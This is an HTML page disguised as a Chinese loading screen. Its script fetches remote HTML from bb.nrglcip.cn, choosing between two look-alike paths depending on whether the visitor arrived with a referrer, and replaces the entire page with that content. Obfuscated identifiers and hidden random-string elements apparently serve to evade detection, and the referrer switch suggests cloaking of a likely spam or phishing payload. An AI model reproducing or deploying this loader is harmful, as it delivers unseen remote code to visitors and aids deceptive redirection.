<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .bS2NFT5YcN0 {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .bS2NFT5YcN0 .X4iTUYV0H {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .bS2NFT5YcN0 .content {
            line-height: 50px;
            text-align: center
        }

        .bS2NFT5YcN0 .img {
            width: 100%
        }

        .bS2NFT5YcN0 .FEunLHmm {
            text-align: center
        }

        .bS2NFT5YcN0 .FEunLHmm span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .bS2NFT5YcN0 .FEunLHmm span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .bS2NFT5YcN0 .FEunLHmm span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .bS2NFT5YcN0 .FEunLHmm span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .bS2NFT5YcN0 .FEunLHmm span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .bS2NFT5YcN0 .FEunLHmm span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .bS2NFT5YcN0 .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function pePB7RUYv(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var P9ej9w = pePB7RUYv('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ P9ej9w +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ P9ej9w +".html?a=share";
		}
		
        eIYJNoa=url+"#"+new Date().getTime();
        eIYJNoa && function() {
            $.get(eIYJNoa, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<li style='display:none' >Ljw7TWxbKaAbQbmQZqXciRYGdIxPdQqnWpSEweSHQnEf</li>
<li style='display:none' >Ljw7TWxbKaAbQbmQZqXciRYGdIxPdQqnWpSEweSHQnEf</li>
<ul style='display:none' >fRtfg3jIZO7h4gvES4gjr0QcOXhLdFdZH5LuKpl77W1D4XTo33kUA29zOsKJqdWEa2NkF1</ul><div class="bS2NFT5YcN0">
    <div class="X4iTUYV0H">
        <div class="FEunLHmm">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<b style='display:none' >sd8Wj2ri3PVVUg5zNcaOHbZGL2VJyKAbdV4</b>
<div style='display:none'>wAmUe9tC4PMX8u7xThYyPA</div>
<span style='display:none'>sWOkaFkipvoGG4xA8Z3DTuFQjDafrBFf7hdTy</span>
<p  style='display:none'>D4HIV5EOmHWXYtvMYmLxZYwtTq2esIkvmb2fmVrtheo4vftuDWfn2RPFwp03ahu27dRs9j5ZYmaLim7</p>
<div style='display:none'>wAmUe9tC4PMX8u7xThYyPA</div></body>
</html>